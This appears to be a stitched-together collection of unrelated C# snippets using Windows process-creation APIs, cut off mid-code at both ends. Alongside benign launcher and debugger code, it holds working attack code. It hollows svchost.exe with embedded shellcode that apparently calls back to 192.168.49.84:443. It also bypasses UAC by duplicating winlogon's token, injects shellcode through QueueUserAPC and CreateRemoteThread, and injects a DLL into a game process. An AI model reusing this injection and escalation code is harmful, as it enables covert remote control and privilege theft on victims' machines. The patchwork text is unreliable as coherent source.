Convert.ToByte(segments[3]); payload[1] = 0x6A; payload[2] = Convert.ToByte(segments[2]); payload[3] = 0x6A; payload[4] = Convert.ToByte(segments[1]); payload[5] = 0x6A; payload[6] = Convert.ToByte(segments[0]); memory.Write((IntPtr)(0x400000 + server.HookTable), payload, false); memory.Write((IntPtr)(0x400000 + server.PatchTable), payload, false); } } IntPtr ThreadHandle = pi.hThread; NativeMethods.ResumeThread(ThreadHandle); var Memory = new MemorySharp((int)pi.dwProcessId); { var injection = Memory.Modules.Inject(LOR_DLL); if (injection.IsValid) { Console.Beep(); } } Application.Exit(); }
public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
static void Main(string[] args) { // Create new svchost process in suspended state STARTUPINFO si = new STARTUPINFO(); PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); bool res = CreateProcess(null, "C:\\Windows\\System32\\svchost.exe", IntPtr.Zero, IntPtr.Zero, false, 0x4, IntPtr.Zero, null, ref si, out pi); // Fetch address of the Process Environment Block (PEB) from the new svchost process PROCESS_BASIC_INFORMATION bi = new PROCESS_BASIC_INFORMATION(); uint tmp = 0; IntPtr hProcess = pi.hProcess; ZwQueryInformationProcess(hProcess, 0, ref bi, (uint)(IntPtr.Size * 6), ref tmp); IntPtr ptrToImageBase = (IntPtr)((Int64)bi.PebAddress + 0x10); // Read the first eight bytes of svchost process memory byte[] addrBuf = new byte[IntPtr.Size]; IntPtr nRead = IntPtr.Zero; ReadProcessMemory(hProcess, ptrToImageBase, addrBuf, addrBuf.Length, out nRead); IntPtr svchostBase = (IntPtr)(BitConverter.ToInt64(addrBuf, 0)); // Parse the PE header from the svchost process memory to identify EntryPoint of executable byte[] data = new byte[0x200]; ReadProcessMemory(hProcess, svchostBase, data, data.Length, out nRead); uint e_lfanew_offset = BitConverter.ToUInt32(data, 0x3C); uint opthdr = e_lfanew_offset + 0x28; uint entrypoint_rva = BitConverter.ToUInt32(data, (int)opthdr); IntPtr addressOfEntryPoint = (IntPtr)(entrypoint_rva + (UInt64)svchostBase); // Overwrite EntryPoint with shellcode byte[] buf = new byte[629] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x51, 0x56, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x4d, 0x31, 0xc9, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x48, 0x8b, 0x52, 0x20, 0x41, 0x51, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0x50, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0x41, 0xc1, 0xc9, 0x0d, 0xac, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x41, 0x58, 0x41, 0x58, 0x48, 0x01, 0xd0, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x4b, 0xff, 0xff, 0xff, 0x5d, 0x48, 0x31, 0xdb, 0x53, 0x49, 0xbe, 0x77, 0x69, 0x6e, 0x69, 0x6e, 0x65, 0x74, 0x00, 0x41, 0x56, 0x48, 0x89, 0xe1, 0x49, 0xc7, 0xc2, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x53, 0x53, 0x48, 0x89, 0xe1, 0x53, 0x5a, 0x4d, 0x31, 0xc0, 0x4d, 0x31, 0xc9, 0x53, 0x53, 0x49, 0xba, 0x3a, 0x56, 0x79, 0xa7, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd5, 0xe8, 0x0e, 0x00, 0x00, 0x00, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x34, 0x39, 0x2e, 0x38, 0x34, 0x00, 0x5a, 0x48, 0x89, 0xc1, 0x49, 0xc7, 0xc0, 0xbb, 0x01, 0x00, 0x00, 0x4d, 0x31, 0xc9, 0x53, 0x53, 0x6a, 0x03, 0x53, 0x49, 0xba, 0x57, 0x89, 0x9f, 0xc6, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd5, 0xe8, 0x4b, 0x00, 0x00, 0x00, 0x2f, 0x79, 0x4e, 0x70, 0x34, 0x52, 0x77, 0x55, 0x36, 0x72, 0x50, 0x6b, 0x6c, 0x70, 0x53, 0x53, 0x6e, 0x52, 0x66, 0x4b, 0x62, 0x77, 0x77, 0x77, 0x44, 0x66, 0x61, 0x6f, 0x48, 0x4d, 0x34, 0x46, 0x6a, 0x4b, 0x30, 0x4f, 0x2d, 0x53, 0x37, 0x69, 0x73, 0x72, 0x4d, 0x51, 0x73, 0x43, 0x56, 0x63, 0x41, 0x4a, 0x62, 0x72, 0x64, 0x4b, 0x77, 0x4b, 0x47, 0x44, 0x64, 0x51, 0x51, 0x67, 0x30, 0x43, 0x51, 0x75, 0x6d, 0x78, 0x79, 0x4e, 0x54, 0x4d, 0x44, 0x55, 0x00, 0x48, 0x89, 0xc1, 0x53, 0x5a, 0x41, 0x58, 0x4d, 0x31, 0xc9, 0x53, 0x48, 0xb8, 0x00, 0x32, 0xa8, 0x84, 0x00, 0x00, 0x00, 0x00, 0x50, 0x53, 0x53, 0x49, 0xc7, 0xc2, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x48, 0x89, 0xc6, 0x6a, 0x0a, 0x5f, 0x48, 0x89, 0xf1, 0x6a, 0x1f, 0x5a, 0x52, 0x68, 0x80, 0x33, 0x00, 0x00, 0x49, 0x89, 0xe0, 0x6a, 0x04, 0x41, 0x59, 0x49, 0xba, 0x75, 0x46, 0x9e, 0x86, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd5, 0x4d, 0x31, 0xc0, 0x53, 0x5a, 0x48, 0x89, 0xf1, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc9, 0x53, 0x53, 0x49, 0xc7, 0xc2, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x75, 0x1f, 0x48, 0xc7, 0xc1, 0x88, 0x13, 0x00, 0x00, 0x49, 0xba, 0x44, 0xf0, 0x35, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd5, 0x48, 0xff, 0xcf, 0x74, 0x02, 0xeb, 0xaa, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x53, 0x59, 0x6a, 0x40, 0x5a, 0x49, 0x89, 0xd1, 0xc1, 0xe2, 0x10, 0x49, 0xc7, 0xc0, 0x00, 0x10, 0x00, 0x00, 0x49, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd5, 0x48, 0x93, 0x53, 0x53, 0x48, 0x89, 0xe7, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x49, 0xc7, 0xc0, 0x00, 0x20, 0x00, 0x00, 0x49, 0x89, 0xf9, 0x49, 0xba, 0x12, 0x96, 0x89, 0xe2, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x20, 0x85, 0xc0, 0x74, 0xb2, 0x66, 0x8b, 0x07, 0x48, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xd2, 0x58, 0xc3, 0x58, 0x6a, 0x00, 0x59, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0x89, 0xda, 0xff, 0xd5 }; WriteProcessMemory(hProcess, addressOfEntryPoint, buf, buf.Length, out nRead); // Resume thread ResumeThread(pi.hThread); }
/// <summary> /// Launches the given application with full admin rights, and in addition bypasses the Vista UAC prompt /// </summary> /// <param name="applicationName">The name of the application to launch</param> /// <param name="procInfo">Process information regarding the launched application that gets returned to the caller</param> /// <returns></returns> public static bool StartProcessAndBypassUAC(String applicationName, out PROCESS_INFORMATION procInfo) { uint winlogonPid = 0; IntPtr hUserTokenDup = IntPtr.Zero, hPToken = IntPtr.Zero, hProcess = IntPtr.Zero; procInfo = new PROCESS_INFORMATION(); // obtain the currently active session id; every logged on user in the system has a unique session id uint dwSessionId = WTSGetActiveConsoleSessionId(); // obtain the process id of the winlogon process that is running within the currently active session Process[] processes = Process.GetProcessesByName("winlogon"); foreach (Process p in processes) { if ((uint)p.SessionId == dwSessionId) { winlogonPid = (uint)p.Id; } } // obtain a handle to the winlogon process hProcess = OpenProcess(MAXIMUM_ALLOWED, false, winlogonPid); // obtain a handle to the access token of the winlogon process if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE, ref hPToken)) { CloseHandle(hProcess); return(false); } // Security attibute structure used in DuplicateTokenEx and CreateProcessAsUser // I would prefer to not have to use a security attribute variable and to just // simply pass null and inherit (by default) the security attributes // of the existing token. However, in C# structures are value types and therefore // cannot be assigned the null value. SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES(); sa.Length = Marshal.SizeOf(sa); // copy the access token of the winlogon process; the newly created token will be a primary token if (!DuplicateTokenEx(hPToken, MAXIMUM_ALLOWED, ref sa, (int)SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, (int)TOKEN_TYPE.TokenPrimary, ref hUserTokenDup)) { CloseHandle(hProcess); CloseHandle(hPToken); return(false); } // By default CreateProcessAsUser creates a process on a non-interactive window station, meaning // the window station has a desktop that is invisible and the process is incapable of receiving // user input. To remedy this we set the lpDesktop parameter to indicate we want to enable user // interaction with the new process. STARTUPINFO si = new STARTUPINFO(); si.cb = (int)Marshal.SizeOf(si); si.lpDesktop = @"winsta0\default"; // interactive window station parameter; basically this indicates that the process created can display a GUI on the desktop // flags that specify the priority and creation method of the process int dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE; // create a new process in the current user's logon session bool result = CreateProcessAsUser(hUserTokenDup, // client's access token null, // file to execute applicationName, // command line ref sa, // pointer to process SECURITY_ATTRIBUTES ref sa, // pointer to thread SECURITY_ATTRIBUTES false, // handles are not inheritable dwCreationFlags, // creation flags IntPtr.Zero, // pointer to new environment block null, // name of current directory ref si, // pointer to STARTUPINFO structure out procInfo // receives information about new process ); // invalidate the handles CloseHandle(hProcess); CloseHandle(hPToken); CloseHandle(hUserTokenDup); return(result); // return the result }
public static PythonTuple CreateProcess( CodeContext context, string applicationName, string commandLineArgs, object pSec /*subprocess.py passes None*/, object tSec /*subprocess.py passes None*/, int?bInheritHandles, uint?dwCreationFlags, PythonDictionary lpEnvironment, string lpCurrentDirectory, object lpStartupInfo /* subprocess.py passes STARTUPINFO*/) { object dwFlags = PythonOps.GetBoundAttr(context, lpStartupInfo, "dwFlags"); //public Int32 dwFlags; object hStdInput = PythonOps.GetBoundAttr(context, lpStartupInfo, "hStdInput"); //public IntPtr hStdInput; object hStdOutput = PythonOps.GetBoundAttr(context, lpStartupInfo, "hStdOutput"); //public IntPtr hStdOutput; object hStdError = PythonOps.GetBoundAttr(context, lpStartupInfo, "hStdError"); //public IntPtr hStdError; object wShowWindow = PythonOps.GetBoundAttr(context, lpStartupInfo, "wShowWindow"); //Int16 wShowWindow; Int32 dwFlagsInt32 = dwFlags != null?Converter.ConvertToInt32(dwFlags) : 0; IntPtr hStdInputIntPtr = hStdInput != null ? new IntPtr(Converter.ConvertToInt32(hStdInput)) : IntPtr.Zero; IntPtr hStdOutputIntPtr = hStdOutput != null ? new IntPtr(Converter.ConvertToInt32(hStdOutput)) : IntPtr.Zero; IntPtr hStdErrorIntPtr = hStdError != null ? new IntPtr(Converter.ConvertToInt32(hStdError)) : IntPtr.Zero; Int16 wShowWindowInt16 = wShowWindow != null?Converter.ConvertToInt16(wShowWindow) : (short)0; STARTUPINFO startupInfo = new STARTUPINFO(); startupInfo.dwFlags = dwFlagsInt32; startupInfo.hStdInput = hStdInputIntPtr; startupInfo.hStdOutput = hStdOutputIntPtr; startupInfo.hStdError = hStdErrorIntPtr; startupInfo.wShowWindow = wShowWindowInt16; // No special security SECURITY_ATTRIBUTES pSecSA = new SECURITY_ATTRIBUTES(); pSecSA.nLength = Marshal.SizeOf(pSecSA); SECURITY_ATTRIBUTES tSecSA = new SECURITY_ATTRIBUTES(); tSecSA.nLength = Marshal.SizeOf(tSecSA); if (pSec != null) { /* If pSec paseed in from Python is not NULL * there needs to be some conversion done here...*/ } if (tSec != null) { /* If tSec paseed in from Python is not NULL * there needs to be some conversion done here...*/ } // If needed convert lpEnvironment Dictonary to lpEnvironmentIntPtr string lpEnvironmentStr = EnvironmentToNative(lpEnvironment); PROCESS_INFORMATION lpProcessInformation = new PROCESS_INFORMATION(); bool result = CreateProcessPI( String.IsNullOrEmpty(applicationName) ? null : applicationName /*applicationNameHelper*//*processStartInfo.FileName*/, String.IsNullOrEmpty(commandLineArgs) ? null : commandLineArgs /*commandLineArgsHelper*//*processStartInfo.Arguments*/, ref pSecSA, ref tSecSA, bInheritHandles.HasValue && bInheritHandles.Value > 0 ? true : false, dwCreationFlags.HasValue ? dwCreationFlags.Value : 0, lpEnvironmentStr, lpCurrentDirectory, ref startupInfo, out lpProcessInformation); if (!result) { int error = Marshal.GetLastWin32Error(); throw PythonExceptions.CreateThrowable(PythonExceptions.WindowsError, error, CTypes.FormatError(error)); } IntPtr hp = lpProcessInformation.hProcess; IntPtr ht = lpProcessInformation.hThread; int pid = lpProcessInformation.dwProcessId; int tid = lpProcessInformation.dwThreadId; return(PythonTuple.MakeTuple( new PythonSubprocessHandle(hp, true), new PythonSubprocessHandle(ht), pid, tid)); }
public static void Main() { uint activeSessID = 0; IntPtr ppSessionInfo = IntPtr.Zero; Int32 count = 0; Int32 retval = WTSEnumerateSessions(IntPtr.Zero, 0, 1, ref ppSessionInfo, ref count); IntPtr current = ppSessionInfo; if (retval != 0) { for (int i = 0; i < count; i++) { current = ppSessionInfo + i * Marshal.SizeOf(typeof(WTS_SESSION_INFO));; WTS_SESSION_INFO si = (WTS_SESSION_INFO)Marshal.PtrToStructure(current, typeof(WTS_SESSION_INFO)); if (si.State == ConnectionState.Active) { Console.WriteLine("found active sess"); Console.WriteLine(si.SessionID); activeSessID = (uint)si.SessionID; } } WTSFreeMemory(ppSessionInfo); } Console.WriteLine(activeSessID); IntPtr hToken = WindowsIdentity.GetCurrent().Token; Console.WriteLine(hToken); IntPtr hDupedToken = IntPtr.Zero; //https://technet.microsoft.com/en-us/ff560499(v=vs.71) int TOKEN_TYPE = 1; //https://msdn.microsoft.com/en-us/windows/desktop/aa379633 int SECURITY_IMPERSONATION_LEVEL = 2; //https://msdn.microsoft.com/zh-tw/windows/hardware/ms717798(v=vs.71) SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES(); sa.Length = Marshal.SizeOf(sa); //https://docs.microsoft.com/en-us/windows/win32/secauthz/access-mask //https://www.pinvoke.net/default.aspx/Enums.ACCESS_MASK //https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights bool result = DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, ref sa, SECURITY_IMPERSONATION_LEVEL, TOKEN_TYPE, ref hDupedToken); if (result) { Console.WriteLine("Hello!!Get the token successfully"); } result = SetTokenInformation(hDupedToken, TOKEN_INFORMATION_CLASS.TokenSessionId, ref activeSessID, 4); if (result) { Console.WriteLine("SetTokenInformation successfully"); } PROCESS_INFORMATION procInfo = new PROCESS_INFORMATION(); STARTUPINFO info = new STARTUPINFO(); result = CreateProcessAsUser(hDupedToken, "C:\\Hackcollege\\start UP\\agreement.exe", null, IntPtr.Zero, IntPtr.Zero, false, (UInt32)CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref info, out procInfo); if (result) { Console.WriteLine("start the agreement"); } }
public static int RunProcess(string userName, string password, string domain, string cmd, string arguments, bool loadUserProfile = true, int logonType = LOGON32_LOGON_BATCH) { bool retValue; IntPtr phToken = IntPtr.Zero; IntPtr phTokenDup = IntPtr.Zero; PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION(); PROFILEINFO pi = new PROFILEINFO(); try { retValue = LogonUser(userName, domain, password, logonType, LOGON32_PROVIDER_DEFAULT, out phToken); if (!retValue) { throw new Exception("Failed to logon as user: "******"Failed to duplicate token: " + GetLastError()); } STARTUPINFO sInfo = new STARTUPINFO(); sInfo.lpDesktop = ""; if (loadUserProfile) { pi.dwSize = Marshal.SizeOf(pi); pi.dwFlags = PI_NOUI; pi.lpUserName = userName; retValue = LoadUserProfile(phTokenDup, ref pi); if (!retValue) { throw new Exception("Failed to get user profile: " + GetLastError()); } } retValue = CreateProcessAsUser(phTokenDup, cmd, arguments, ref sa, ref sa, false, 0, IntPtr.Zero, null, ref sInfo, out pInfo); if (!retValue) { throw new Exception("Failed to create process as user: "******"Process returned exit status: " + GetLastError()); } int exitCode; retValue = GetExitCodeProcess(pInfo.hProcess, out exitCode); if (!retValue) { throw new Exception("Failed to get exit code status" + GetLastError()); } return(exitCode); } finally { if (pi.hProfile != IntPtr.Zero) { UnloadUserProfile(phTokenDup, pi.hProfile); } if (phToken != IntPtr.Zero) { CloseHandle(phToken); } if (phTokenDup != IntPtr.Zero) { CloseHandle(phTokenDup); } if (pInfo.hProcess != IntPtr.Zero) { CloseHandle(pInfo.hProcess); } } }
private void StartProcessInSession(string targetsession, string processName, string parameter, string workingDirectory, bool runas, bool hide) { uint targetSessionId = 0xFFFFFFFF; process = null; WriteVerboseToLog("Starting process " + processName + " in session " + targetsession + "."); int tempInt; if (Int32.TryParse(targetsession, out tempInt)) { // target session specified as number if (tempInt >= 0) { targetSessionId = (uint)tempInt; } } else { // target session specified as text if ((targetsession.Length > 5) && (targetsession.ToLower().Substring(0, 5) == "user:"******"user:"******"service": case "services": targetSessionId = 0; break; case "console": targetSessionId = GetConsoleSession(); break; case "active": targetSessionId = GetUserSession(null, WTS_CONNECTSTATE_CLASS.WTSActive); break; case "disconnected": targetSessionId = GetUserSession(null, WTS_CONNECTSTATE_CLASS.WTSDisconnected); break; } } } if (targetSessionId == 0xFFFFFFFF) { // could not find selected session WriteVerboseToLog("Target session " + targetsession + " not found or accessible."); return; } if ((targetSessionId == 0) && (Process.GetCurrentProcess().SessionId == 0)) { // in session 0 WriteVerboseToLog("Start in session of service requested, direct start"); // ignore hide parameter because no one "sees" session 0 // ignore runas parameter because there is user for session 0 StartProcess(processName, parameter, workingDirectory); return; } WriteVerboseToLog("Start in session " + targetSessionId.ToString() + " requested."); IntPtr hProcessToken; if (runas) { // start process as session user if (targetSessionId == 0) { // cannot start with runas in session 0 WriteVerboseToLog("Cannot start program in service session because there is no session user."); return; } hProcessToken = GetTokenFromSession(targetSessionId); if (hProcessToken == IntPtr.Zero) { // could not retrieve session token WriteVerboseToLog("Cannot retrieve token of target session " + targetsession + ". Error: " + Marshal.GetLastWin32Error().ToString()); return; } } else { // start process as own process user hProcessToken = GetTokenFromCurrentProcess(); if (hProcessToken == IntPtr.Zero) { // could not retrieve session token WriteVerboseToLog("Cannot retrieve token of target session " + targetsession + ". Error: " + Marshal.GetLastWin32Error().ToString()); return; } // do I have to change the session? if (targetSessionId != Process.GetCurrentProcess().SessionId) { if (!SetTokenSession(ref hProcessToken, targetSessionId)) { // could not set session id of token WriteVerboseToLog("Cannot set session " + targetsession + ". Error: " + Marshal.GetLastWin32Error().ToString()); return; } } } if (elevate >= 0) { // elevation or unelevation requested GetElevatedToken(ref hProcessToken, elevate == 1); } IntPtr pEnvironment = IntPtr.Zero; if (!CreateEnvironmentBlock(out pEnvironment, hProcessToken, false)) { // could not create environment block pEnvironment = IntPtr.Zero; WriteVerboseToLog("Cannot create environment block for target session, continuing without."); } if (parameter != "") { processName += " " + parameter; } if (workingDirectory == "") { workingDirectory = null; } uint dwCreationFlags = 0x00000410; // CREATE_NEW_CONSOLE + CREATE_UNICODE_ENVIRONMENT PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); STARTUPINFO si = new STARTUPINFO(); // Initialize struct si.cb = Marshal.SizeOf(si); si.dwFlags = 0x00000001; // STARTF_USESHOWWINDOW if (hide) { si.wShowWindow = 0; // SW_HIDE } else { si.wShowWindow = 5; // SW_SHOW } si.lpDesktop = "winsta0\\default"; int rc = 0; if (!CreateProcessAsUser(hProcessToken, null, processName, IntPtr.Zero, IntPtr.Zero, false, dwCreationFlags, pEnvironment, workingDirectory, ref si, out pi)) { // could not start process WriteVerboseToLog("Cannot start process " + processName + ". Error: " + Marshal.GetLastWin32Error().ToString()); rc = -1; } WriteVerboseToLog("Process " + processName + " started in session " + targetSessionId.ToString() + "."); if (pEnvironment != IntPtr.Zero) { // free memory of environment block (process has a copy) DestroyEnvironmentBlock(pEnvironment); } if (rc == 0) { // store process object process = Process.GetProcessById(pi.dwProcessId); // close handles that only exist when no error occurred CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } // close remaining handle CloseHandle(hProcessToken); }
internal static extern void CorLaunchApplication(UInt32 hostType, string applicationFullName, int manifestPathsCount, string[] manifestPaths, int activationDataCount, string[] activationData, PROCESS_INFORMATION processInformation);
private static extern bool CreateProcessAsUser(IntPtr hToken, string lpApplicationName, string lpCommandLine, /* ref */ IntPtr lpProcessAttributes, /* ref */ IntPtr lpThreadAttributes, // since we only call this with null we omit ref and type for laziness bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
static int Main(string[] args) { var exe = Assembly.GetExecutingAssembly().Location; var dir = Path.GetDirectoryName(exe); var name = Path.GetFileNameWithoutExtension(exe); var configPath = Path.Combine(dir, name + ".shim"); if (!File.Exists(configPath)) { Console.Error.WriteLine("Couldn't find " + Path.GetFileName(configPath) + " in " + dir); return(1); } var config = Config(configPath); var path = Get(config, "path"); var add_args = Get(config, "args"); var si = new STARTUPINFO(); var pi = new PROCESS_INFORMATION(); // create command line var cmd_args = add_args ?? ""; var pass_args = Serialize(args); if (!string.IsNullOrEmpty(pass_args)) { if (!string.IsNullOrEmpty(cmd_args)) { cmd_args += " "; } cmd_args += pass_args; } if (!string.IsNullOrEmpty(cmd_args)) { cmd_args = " " + cmd_args; } var cmd = "\"" + path + "\"" + cmd_args; if (!CreateProcess(null, cmd, IntPtr.Zero, IntPtr.Zero, bInheritHandles: true, dwCreationFlags: 0, lpEnvironment: IntPtr.Zero, // inherit parent lpCurrentDirectory: null, // inherit parent lpStartupInfo: ref si, lpProcessInformation: out pi)) { return(Marshal.GetLastWin32Error()); } WaitForSingleObject(pi.hProcess, INFINITE); uint exit_code = 0; GetExitCodeProcess(pi.hProcess, out exit_code); // Close process and thread handles. CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return((int)exit_code); }
private static void ExecQueueUserAPC() { //Initialization IntPtr bytesWritten = IntPtr.Zero; String process = String.Empty; byte[] shellcode = new byte[] { }; // Prevent multi-execution of payloads if (!SafetyHandler()) { return; } // Set Shellcode if (OsIs32()) { process = DefaultProcPath; shellcode = Convert.FromBase64String(Shellcode32); } else { if (IntPtr.Size == 8) { process = DefaultProcPath; shellcode = Convert.FromBase64String(Shellcode64); } else { process = SysWOW64ProcPath; shellcode = Convert.FromBase64String(Shellcode32); } } //Start process to inject into PROCESS_INFORMATION processInfo = StartProcess(process); if (processInfo.hProcess == IntPtr.Zero) { return; } Process targetProcess = Process.GetProcessById((int)processInfo.dwProcessId); //Allocate executable memory IntPtr address = VirtualAllocEx(processInfo.hProcess, IntPtr.Zero, shellcode.Length, MEM_COMMIT, PAGE_READWRITE); if (address == IntPtr.Zero) { TerminateProcess(processInfo.hProcess, 0); return; } //Write shellcode into allocated memory in target process if (!WriteProcessMemory(processInfo.hProcess, address, shellcode, shellcode.Length, out bytesWritten)) { //Clean up memory allocation, stop process, and exit Clean(processInfo.hProcess, address, shellcode.Length); return; } //Modify memory protections to allow execution if (!VirtualProtectEx(processInfo.hProcess, address, shellcode.Length, PAGE_EXECUTE_READ, out uint oldProtect)) { //Clean up memory allocation, stop process, and exit Clean(processInfo.hProcess, address, shellcode.Length); return; } //Open a thread in target process ProcessThreadCollection currentThreads = Process.GetProcessById((int)processInfo.dwProcessId).Threads; IntPtr thread = OpenThread(ThreadAccess.SET_CONTEXT, false, currentThreads[0].Id); if (thread == IntPtr.Zero) { //Clean up memory allocation, stop process, and exit Clean(processInfo.hProcess, address, shellcode.Length); return; } //Queue thread for asynchronous procedure call IntPtr ptr = QueueUserAPC(address, thread, IntPtr.Zero); if (ptr == IntPtr.Zero) { //Clean up memory allocation, stop process, and exit Clean(processInfo.hProcess, address, shellcode.Length); return; } //Resume thread to execute shellcode if (ResumeThread(processInfo.hThread) == 0) { //Clean up memory allocation, stop process, and exit Clean(processInfo.hProcess, address, shellcode.Length); return; } }
private static extern bool CreateProcessWithTokenW(IntPtr hToken, uint dwLogonFlags, string lpApplicationName, string lpCommandLine, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
private static void ExecCreateRemoteThread() { //Initialization IntPtr bytesWritten = IntPtr.Zero; String process = String.Empty; byte[] shellcode = new byte[] { }; // Prevent multi-execution of payloads if (!SafetyHandler()) { return; } // Set Shellcode if (OsIs32()) { process = DefaultProcPath; shellcode = Convert.FromBase64String(Shellcode32); } else { if (IntPtr.Size == 8) { process = DefaultProcPath; shellcode = Convert.FromBase64String(Shellcode64); } else { process = SysWOW64ProcPath; shellcode = Convert.FromBase64String(Shellcode32); } } //Start process to inject into PROCESS_INFORMATION processInfo = StartProcess(process); if (processInfo.hProcess == IntPtr.Zero) { return; } //Allocate executable memory IntPtr address = VirtualAllocEx(processInfo.hProcess, IntPtr.Zero, shellcode.Length, MEM_COMMIT, PAGE_READWRITE); if (address == IntPtr.Zero) { TerminateProcess(processInfo.hProcess, 0); return; } //Write shellcode into allocated memory in target process if (!WriteProcessMemory(processInfo.hProcess, address, shellcode, shellcode.Length, out bytesWritten)) { //Clean up memory allocation, stop process, and exit Clean(processInfo.hProcess, address, shellcode.Length); return; } //Modify memory protections to allow execution if (!VirtualProtectEx(processInfo.hProcess, address, shellcode.Length, PAGE_EXECUTE_READ, out uint oldProtect)) { //Clean up memory allocation, stop process, and exit Clean(processInfo.hProcess, address, shellcode.Length); return; } //Create thread in remote process to execute shellcode if (CreateRemoteThread(processInfo.hProcess, IntPtr.Zero, 0, address, IntPtr.Zero, 0, IntPtr.Zero) == IntPtr.Zero) { //Clean up memory allocation, stop process, and exit Clean(processInfo.hProcess, address, shellcode.Length); return; } }
public unsafe static DnDebugger CreateDnDebugger(DebugProcessOptions options, CoreCLRTypeDebugInfo info, IntPtr outputHandle, IntPtr errorHandle, Func <bool> keepWaiting, Func <ICorDebug, string, uint, string, DnDebugger> createDnDebugger) { var dbgShimState = GetOrCreateDbgShimState(info.HostFilename, info.DbgShimFilename); if (dbgShimState == null) { throw new Exception(string.Format("Could not load dbgshim.dll: '{0}' . Make sure you use the {1}-bit version", info.DbgShimFilename, IntPtr.Size * 8)); } var startupEvent = IntPtr.Zero; var hThread = IntPtr.Zero; IntPtr pHandleArray = IntPtr.Zero, pStringArray = IntPtr.Zero; uint dwArrayLength = 0; var pi = new PROCESS_INFORMATION(); bool error = true, calledSetEvent = false; try { bool inheritHandles = options.InheritHandles; var dwCreationFlags = options.ProcessCreationFlags ?? DebugProcessOptions.DefaultProcessCreationFlags; dwCreationFlags |= ProcessCreationFlags.CREATE_SUSPENDED; var si = new STARTUPINFO(); si.hStdOutput = outputHandle; si.hStdError = errorHandle; if (si.hStdOutput != IntPtr.Zero || si.hStdError != IntPtr.Zero) { si.dwFlags |= STARTUPINFO.STARTF_USESTDHANDLES; inheritHandles = true; } si.cb = (uint)(4 * 1 + IntPtr.Size * 3 + 4 * 8 + 2 * 2 + IntPtr.Size * 4); var cmdline = "\"" + info.HostFilename + "\" " + info.HostCommandLine + " \"" + options.Filename + "\"" + (string.IsNullOrEmpty(options.CommandLine) ? string.Empty : " " + options.CommandLine); var env = Win32EnvironmentStringBuilder.CreateEnvironmentUnicodeString(options.Environment); dwCreationFlags |= ProcessCreationFlags.CREATE_UNICODE_ENVIRONMENT; bool b = 